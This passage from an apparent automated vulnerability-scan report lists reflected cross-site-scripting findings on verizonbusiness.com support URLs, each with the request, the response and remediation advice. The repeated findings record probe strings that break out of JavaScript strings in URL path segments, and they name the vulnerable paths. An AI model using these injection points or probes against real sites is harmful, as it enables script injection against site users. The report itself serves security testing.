hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.1057. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462a6"%3b1ec12769be was submitted in the REST URL parameter 2. This input was echoed as 462a6";1ec12769be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount462a6"%3b1ec12769be/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:09 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount462a6";1ec12769be/tools/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.1058. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df34'%3b893a65c90a7 was submitted in the REST URL parameter 2. This input was echoed as 5df34';893a65c90a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount5df34'%3b893a65c90a7/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount5df34';893a65c90a7/tools/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1059. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ca91"%3b8aa117c2337 was submitted in the REST URL parameter 3. This input was echoed as 5ca91";8aa117c2337 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools5ca91"%3b8aa117c2337/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:50 GMT
Content-Type: text/html
Content-Length: 43848
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools5ca91";8aa117c2337/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1060. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af86e'%3bd0c97b54d0 was submitted in the REST URL parameter 3. This input was echoed as af86e';d0c97b54d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsaf86e'%3bd0c97b54d0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:22 GMT
Content-Type: text/html
Content-Length: 43846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/toolsaf86e';d0c97b54d0/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1061. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5246"%3b53f8d206358 was submitted in the REST URL parameter 1. This input was echoed as e5246";53f8d206358 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supporte5246"%3b53f8d206358/myaccount/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:32:06 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40660
Date: Wed, 17 Nov 2010 00:32:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supporte5246";53f8d206358/myaccount/tools/center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.1062. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9a68'%3bfdfc0594f24 was submitted in the REST URL parameter 1. This input was echoed as d9a68';fdfc0594f24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supportd9a68'%3bfdfc0594f24/myaccount/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/supportd9a68';fdfc0594f24/myaccount/tools/center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1063. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efefe"%3ba0dbaef307b was submitted in the REST URL parameter 2. This input was echoed as efefe";a0dbaef307b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountefefe"%3ba0dbaef307b/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccountefefe";a0dbaef307b/tools/center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.1064. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f85'%3bd8a17e6ccec was submitted in the REST URL parameter 2. This input was echoed as d5f85';d8a17e6ccec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountd5f85'%3bd8a17e6ccec/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccountd5f85';d8a17e6ccec/tools/center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1065. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7d"%3b63e98bf77e0 was submitted in the REST URL parameter 3. This input was echoed as 46b7d";63e98bf77e0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools46b7d"%3b63e98bf77e0/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43860
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools46b7d";63e98bf77e0/center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.1066. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3b71'%3b40115d7665b was submitted in the REST URL parameter 3. This input was echoed as d3b71';40115d7665b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsd3b71'%3b40115d7665b/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43862
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/toolsd3b71';40115d7665b/center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1067. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2e6"%3b1b8527b1fb2 was submitted in the REST URL parameter 4. This input was echoed as 9e2e6";1b8527b1fb2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/center9e2e6"%3b1b8527b1fb2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:43 GMT
Content-Type: text/html
Content-Length: 46512
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools/center9e2e6";1b8527b1fb2/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1068. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 582bc'%3bb721382ff28 was submitted in the REST URL parameter 4. This input was echoed as 582bc';b721382ff28 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/center582bc'%3bb721382ff28/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:11 GMT
Content-Type: text/html
Content-Length: 46512
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools/center582bc';b721382ff28/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1069. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3685'%3b8d328b9c15e was submitted in the REST URL parameter 1. This input was echoed as a3685';8d328b9c15e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supporta3685'%3b8d328b9c15e/myaccount/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:40 GMT

